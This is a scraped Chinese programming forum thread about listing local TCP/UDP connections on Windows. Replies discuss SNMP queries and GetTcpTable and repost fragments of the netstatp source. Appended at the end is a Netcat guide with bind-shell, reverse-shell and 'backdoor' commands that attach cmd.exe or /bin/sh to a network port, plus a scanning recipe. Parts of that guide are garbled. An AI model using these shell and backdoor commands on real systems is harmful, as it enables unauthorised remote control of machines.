如何捕获当前所有和本机相连的tcp/udp连接的信息(包括对方ip、port和my prot)?

shprog 2000-09-08 04:47:00
...全文
1687 53 打赏 收藏 转发到动态 举报
写回复
用AI写文章
53 条回复
切换为时间正序
请发表友善的回复…
发表回复
kindheart 2001-09-03
  • 打赏
  • 举报
回复
jjony: 给我一份吧,thanks
lu_shenghong@sina.com
shprog 2000-11-27
  • 打赏
  • 举报
回复
不好意思,工作原因,消失了2个月:)

to jjony: 给我一份吧,3ks
shyrain@etang.com
playboy2000 2000-10-13
  • 打赏
  • 举报
回复
to jjony
是不是 windump? winpcap? packet32.dll??不是的话,能否也给我一份?
thanks mail to playboybo@263.net..
bigjim 2000-10-13
  • 打赏
  • 举报
回复
JJONY,能不能也给我一份?谢谢!!!!!!!!!!!!!!
nicholas 2000-10-13
  • 打赏
  • 举报
回复
亲爱的JJONY,给我一个吧?:)
wsoft 2000-10-13
  • 打赏
  • 举报
回复
同意sikao,使用SnmpExtensionQuery(
BYTE bPduType, // SNMPv1 PDU request type
SnmpVarBindList *pVarBindList, // pointer to variable bindings
AsnInteger32 *pErrorStatus, // pointer to SNMPv1 error status
AsnInteger32 *pErrorIndex
)
这样通过反复调用该函数就能检测到所有的tcp和udp端口
实在不懂,我有源程序。
alanlee 2000-10-11
  • 打赏
  • 举报
回复
确实是好问题,想问不敢问,怕人说是黑客技术,请高手答复
xjaguar2000 2000-10-11
  • 打赏
  • 举报
回复
如果不了解 SNMP 的话,建议先读些 SNMP 的资料,一般计算机网络的教材上都会提到SNMP。netstat 的核心就是调用 SnmpExtensionQuery 来查询本机上 TCP/UDP 的信息。我贴出 Mark Russinovich 的 netstatp 的源程序,请仔细读一读,并不复杂,而且还有
足够的注释。(附:MIB 的对象命名树中 TCP 标示符为 { 1,3,6,1,2,1,6,13,1,1},
UDP标示符为{ 1,3,6,1,2,1,7,5,1,1})
JJONY 2000-10-11
  • 打赏
  • 举报
回复
我有一个程序(含源代码)是捕获网络数据包的,我可以给你
JJONY 2000-10-11
  • 打赏
  • 举报
回复
呵呵,关于这个问题,在不久之前也有人问过类似的问题(之于是那个帖子我就忘记了),也是捕获网络上的数据包的。我有一个程序可以捕获,是用NDIS写的,最终WIN32程序可以调用它提供的DLL取得数据包。
我可以发一个给你
xjaguar2000 2000-10-11
  • 打赏
  • 举报
回复
如果不了解 SNMP 的话,建议先读些 SNMP 的资料,一般计算机网络的教材上都会提到SNMP。
netstat 的核心就是调用 SnmpExtensionQuery 来查询本机上 TCP/UDP 的信息。
我贴出 Mark Russinovich 的 netstatp 的源程序,请仔细读一读,并不复杂,而且还有
足够的注释。
(附:MIB 的对象命名树中 TCP 标示符为 { 1,3,6,1,2,1,6,13,1,1},
UDP标示符为{ 1,3,6,1,2,1,7,5,1,1};)

//------------------------------------------------------------
//
// Netstatp
//
// Copyright (C) 1998 Mark Russinovich
// Systems Internals
// http://www.sysinternals.com
//
// This program implements a subset of the Netstat program's
// functionality. Specifically, it enumerates and displays
// information about all UDP and TCP endpoints.
//
//------------------------------------------------------------
#include "windows.h"
#include "stdio.h"
#include "snmp.h"
#include "winsock.h"

#define HOSTNAMELEN 256
#define PORTNAMELEN 256
#define ADDRESSLEN HOSTNAMELEN+PORTNAMELEN

typedef struct _tcpinfo {
struct _tcpinfo *prev;
struct _tcpinfo *next;
UINT state;
UINT localip;
UINT localport;
UINT remoteip;
UINT remoteport;
} TCPINFO, *PTCPINFO;


BOOL (__stdcall *pSnmpExtensionInit)(
IN DWORD dwTimeZeroReference,
OUT HANDLE *hPollForTrapEvent,
OUT AsnObjectIdentifier *supportedView);

BOOL (__stdcall *pSnmpExtensionQuery)(
IN BYTE requestType,
IN OUT RFC1157VarBindList *variableBindings,
OUT AsnInteger *errorStatus,
OUT AsnInteger *errorIndex);

//
// Possible TCP endpoint states
//
static char TcpState[][32] = {
"???",
"CLOSED",
"LISTENING",
"SYN_SENT",
"SEN_RECEIVED",
"ESTABLISHED",
"FIN_WAIT",
"FIN_WAIT2",
"CLOSE_WAIT",
"CLOSING",
"LAST_ACK",
"TIME_WAIT"
};

//
// Lists of endpoints
//
TCPINFO TcpInfoTable;
TCPINFO UdpInfoTable;
vcmfc 2000-10-11
  • 打赏
  • 举报
回复
playpcgame所提到的netstat.exe在《windows网络编程技术》中第四部分IP助手函数中提到其原理:
1。取得TCP连接表函数:::GetTcpTable();
2.取得UPD监听者表函数:::GetUdpTable();
3.取得IP协议统计情况函数:::GetIpStatistics();
希望对你有帮助.
vcmfc 2000-10-11
  • 打赏
  • 举报
回复
playpcgame所提到的netstat.exe在《windows网络编程技术》中第四部分IP助手函数中提到其原理:
1。取得TCP连接表函数:::GetTcpTable();
2.取得UPD监听者表函数:::GetUdpTable();
3.取得IP协议统计情况函数:::GetIpStatistics();
希望对你有帮助.
xjaguar2000 2000-10-11
  • 打赏
  • 举报
回复
如果不了解 SNMP 的话,建议先读些 SNMP 的资料,一般计算机网络的教材上都会提到SNMP。
netstat 的核心就是调用 SnmpExtensionQuery 来查询本机上 TCP/UDP 的信息。
我贴出 Mark Russinovich 的 netstatp 的源程序,请仔细读一读,并不复杂,而且还有
足够的注释。
(附:MIB 的对象命名树中 TCP 标示符为 { 1,3,6,1,2,1,6,13,1,1},
UDP标示符为{ 1,3,6,1,2,1,7,5,1,1};)
由于回复超时,我只好把源程序分开贴...

xjaguar2000 2000-10-11
  • 打赏
  • 举报
回复
如果不了解 SNMP 的话,建议先读些 SNMP 的资料,一般计算机网络的教材上都会提到SNMP。
netstat 的核心就是调用 SnmpExtensionQuery 来查询本机上 TCP/UDP 的信息。
我贴出 Mark Russinovich 的 netstatp 的源程序,请仔细读一读,并不复杂,而且还有
足够的注释。
(附:MIB 的对象命名树中 TCP 标示符为 { 1,3,6,1,2,1,6,13,1,1},
UDP标示符为{ 1,3,6,1,2,1,7,5,1,1};)
由于回复超时,我只好把源程序分开贴...

//------------------------------------------------------------
//
// Netstatp
//
// Copyright (C) 1998 Mark Russinovich
// Systems Internals
// http://www.sysinternals.com
//
// This program implements a subset of the Netstat program's
// functionality. Specifically, it enumerates and displays
// information about all UDP and TCP endpoints.
//
//------------------------------------------------------------
#include "windows.h"
#include "stdio.h"
#include "snmp.h"
#include "winsock.h"

#define HOSTNAMELEN 256
#define PORTNAMELEN 256
#define ADDRESSLEN HOSTNAMELEN+PORTNAMELEN

typedef struct _tcpinfo {
struct _tcpinfo *prev;
struct _tcpinfo *next;
UINT state;
UINT localip;
UINT localport;
UINT remoteip;
UINT remoteport;
} TCPINFO, *PTCPINFO;


BOOL (__stdcall *pSnmpExtensionInit)(
IN DWORD dwTimeZeroReference,
OUT HANDLE *hPollForTrapEvent,
OUT AsnObjectIdentifier *supportedView);

BOOL (__stdcall *pSnmpExtensionQuery)(
IN BYTE requestType,
IN OUT RFC1157VarBindList *variableBindings,
OUT AsnInteger *errorStatus,
OUT AsnInteger *errorIndex);

//
// Possible TCP endpoint states
//
static char TcpState[][32] = {
"???",
"CLOSED",
"LISTENING",
"SYN_SENT",
"SEN_RECEIVED",
"ESTABLISHED",
"FIN_WAIT",
"FIN_WAIT2",
"CLOSE_WAIT",
"CLOSING",
"LAST_ACK",
"TIME_WAIT"
};

//
// Lists of endpoints
//
TCPINFO TcpInfoTable;
TCPINFO UdpInfoTable;
xjaguar2000 2000-10-11
  • 打赏
  • 举报
回复
如果不了解 SNMP 的话,建议先读些 SNMP 的资料,一般计算机网络的教材上都会提到SNMP。netstat 的核心就是调用 SnmpExtensionQuery 来查询本机上 TCP/UDP 的信息。
我贴出 Mark Russinovich 的 netstatp 的源程序,请仔细读一读,并不复杂,而且还有
足够的注释。(附:MIB 的对象命名树中 TCP 标示符为 { 1,3,6,1,2,1,6,13,1,1},
UDP标示符为{ 1,3,6,1,2,1,7,5,1,1};)由于回复超时,我只好把源程序分开贴...
xjaguar2000 2000-10-11
  • 打赏
  • 举报
回复
如果不了解 SNMP 的话,建议先读些 SNMP 的资料,一般计算机网络的教材上都会提到SNMP。
netstat 的核心就是调用 SnmpExtensionQuery 来查询本机上 TCP/UDP 的信息。
我贴出 Mark Russinovich 的 netstatp 的源程序,请仔细读一读,并不复杂,而且还有
足够的注释。
(附:MIB 的对象命名树中 TCP 标示符为 { 1,3,6,1,2,1,6,13,1,1},
UDP标示符为{ 1,3,6,1,2,1,7,5,1,1};)
由于回复超时,我只好把源程序分开贴...

//------------------------------------------------------------
//
// Netstatp
//
// Copyright (C) 1998 Mark Russinovich
// Systems Internals
// http://www.sysinternals.com
//
// This program implements a subset of the Netstat program's
// functionality. Specifically, it enumerates and displays
// information about all UDP and TCP endpoints.
//
//------------------------------------------------------------
#include "windows.h"
#include "stdio.h"
#include "snmp.h"
#include "winsock.h"

#define HOSTNAMELEN 256
#define PORTNAMELEN 256
#define ADDRESSLEN HOSTNAMELEN+PORTNAMELEN

typedef struct _tcpinfo {
struct _tcpinfo *prev;
struct _tcpinfo *next;
UINT state;
UINT localip;
UINT localport;
UINT remoteip;
UINT remoteport;
} TCPINFO, *PTCPINFO;


BOOL (__stdcall *pSnmpExtensionInit)(
IN DWORD dwTimeZeroReference,
OUT HANDLE *hPollForTrapEvent,
OUT AsnObjectIdentifier *supportedView);

BOOL (__stdcall *pSnmpExtensionQuery)(
IN BYTE requestType,
IN OUT RFC1157VarBindList *variableBindings,
OUT AsnInteger *errorStatus,
OUT AsnInteger *errorIndex);

//
// Possible TCP endpoint states
//
static char TcpState[][32] = {
"???",
"CLOSED",
"LISTENING",
"SYN_SENT",
"SEN_RECEIVED",
"ESTABLISHED",
"FIN_WAIT",
"FIN_WAIT2",
"CLOSE_WAIT",
"CLOSING",
"LAST_ACK",
"TIME_WAIT"
};

//
// Lists of endpoints
//
TCPINFO TcpInfoTable;
TCPINFO UdpInfoTable;
xjaguar2000 2000-10-11
  • 打赏
  • 举报
回复
如果不了解 SNMP 的话,建议先读些 SNMP 的资料,一般计算机网络的教材上都会提到SNMP。
netstat 的核心就是调用 SnmpExtensionQuery 来查询本机上 TCP/UDP 的信息。
我贴出 Mark Russinovich 的 netstatp 的源程序,请仔细读一读,并不复杂,而且还有
足够的注释。
(附:MIB 的对象命名树中 TCP 标示符为 { 1,3,6,1,2,1,6,13,1,1},
UDP标示符为{ 1,3,6,1,2,1,7,5,1,1};)
由于回复超时,我只好把源程序分开贴...
xjaguar2000 2000-10-11
  • 打赏
  • 举报
回复
如果不了解 SNMP 的话,建议先读些 SNMP 的资料,一般计算机网络的教材上都会提到SNMP。
netstat 的核心就是调用 SnmpExtensionQuery 来查询本机上 TCP/UDP 的信息。
我贴出 Mark Russinovich 的 netstatp 的源程序,请仔细读一读,并不复杂,而且还有
足够的注释。
(附:MIB 的对象命名树中 TCP 标示符为 { 1,3,6,1,2,1,6,13,1,1},
UDP标示符为{ 1,3,6,1,2,1,7,5,1,1};)
由于回复超时,我只好把源程序分开贴...

//------------------------------------------------------------
//
// Netstatp
//
// Copyright (C) 1998 Mark Russinovich
// Systems Internals
// http://www.sysinternals.com
//
// This program implements a subset of the Netstat program's
// functionality. Specifically, it enumerates and displays
// information about all UDP and TCP endpoints.
//
//------------------------------------------------------------
#include "windows.h"
#include "stdio.h"
#include "snmp.h"
#include "winsock.h"

#define HOSTNAMELEN 256
#define PORTNAMELEN 256
#define ADDRESSLEN HOSTNAMELEN+PORTNAMELEN

typedef struct _tcpinfo {
struct _tcpinfo *prev;
struct _tcpinfo *next;
UINT state;
UINT localip;
UINT localport;
UINT remoteip;
UINT remoteport;
} TCPINFO, *PTCPINFO;


BOOL (__stdcall *pSnmpExtensionInit)(
IN DWORD dwTimeZeroReference,
OUT HANDLE *hPollForTrapEvent,
OUT AsnObjectIdentifier *supportedView);

BOOL (__stdcall *pSnmpExtensionQuery)(
IN BYTE requestType,
IN OUT RFC1157VarBindList *variableBindings,
OUT AsnInteger *errorStatus,
OUT AsnInteger *errorIndex);

//
// Possible TCP endpoint states
//
static char TcpState[][32] = {
"???",
"CLOSED",
"LISTENING",
"SYN_SENT",
"SEN_RECEIVED",
"ESTABLISHED",
"FIN_WAIT",
"FIN_WAIT2",
"CLOSE_WAIT",
"CLOSING",
"LAST_ACK",
"TIME_WAIT"
};

//
// Lists of endpoints
//
TCPINFO TcpInfoTable;
TCPINFO UdpInfoTable;
xjaguar2000 2000-10-11
  • 打赏
  • 举报
回复
如果不了解 SNMP 的话,建议先读些 SNMP 的资料,一般计算机网络的教材上都会提到SNMP。
netstat 的核心就是调用 SnmpExtensionQuery 来查询本机上 TCP/UDP 的信息。
我贴出 Mark Russinovich 的 netstatp 的源程序,请仔细读一读,并不复杂,而且还有
足够的注释。
(附:MIB 的对象命名树中 TCP 标示符为 { 1,3,6,1,2,1,6,13,1,1},
UDP标示符为{ 1,3,6,1,2,1,7,5,1,1};)
由于回复超时,我只好把源程序分开贴...

加载更多回复(33)
软件介绍: 工具名:Netcat 作者:Hobbit && Chris Wysopal 类别:开放源码 平台:Linux/BSD/Unix/Windows WINDOWS下版本号:[v1.10 NT] 参数介绍: *nc.exe -h*即可看到各参数的使用方法。 基本格式:nc [-options] hostname port[s] [ports] … nc -l -p port [options] [hostname] [port] -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连接关闭后,仍然继续监听 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 随机本地及远程端口 -s addr 本地源地址 -t 使用TELNET交互方式 -u UDP模式 -v 详细输出–用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉–用于扫描时 端口的表示方法可写为M-N的范围格式。 ======================================================== 基本用法: 1)连接到REMOTE主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口 2)监听LOCAL主机,例子: 格式:nc -l -p 80 讲解:监听本机TCP80端口 3)扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x的TCP80到TCP445的所有端口 4)REMOTE主机绑定SHELL,例子: 格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe 讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 5)REMOTE主机绑定SHELL并反向连接,例子: 格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令”|”与重定向命令””等等命令功能更强大……)。 ======================================================== 高级用法: 6)作攻击程序用,例子: 格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 c:log.txt 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到*c:log.txt*中,如果把*>* 改为*>>*即可以追加日志 附:*c:log.txt*为日志等 9)作蜜罐用[3],例子: 格式1:nc -L -p 80 < c:honeypot.txt 格式2:type.exe c:honeypot.txt|nc -L -p 80 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,并把*c:honeypot.txt*的内容*送*入其管道中 10) 后门 victim machine: //受害者的机器 nc -l -p port -e cmd //win2000 nc -l -p port -e /bin/sh //unix,linux

16,472

社区成员

发帖
与我相关
我的任务
社区描述
VC/MFC相关问题讨论
社区管理员
  • 基础类社区
  • Web++
  • encoderlee
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

        VC/MFC社区版块或许是CSDN最“古老”的版块了,记忆之中,与CSDN的年龄几乎差不多。随着时间的推移,MFC技术渐渐的偏离了开发主流,若干年之后的今天,当我们面对着微软的这个经典之笔,内心充满着敬意,那些曾经的记忆,可以说代表着二十年前曾经的辉煌……
        向经典致敬,或许是老一代程序员内心里面难以释怀的感受。互联网大行其道的今天,我们期待着MFC技术能够恢复其曾经的辉煌,或许这个期待会永远成为一种“梦想”,或许一切皆有可能……
        我们希望这个版块可以很好的适配Web时代,期待更好的互联网技术能够使得MFC技术框架得以重现活力,……

试试用AI创作助手写篇文章吧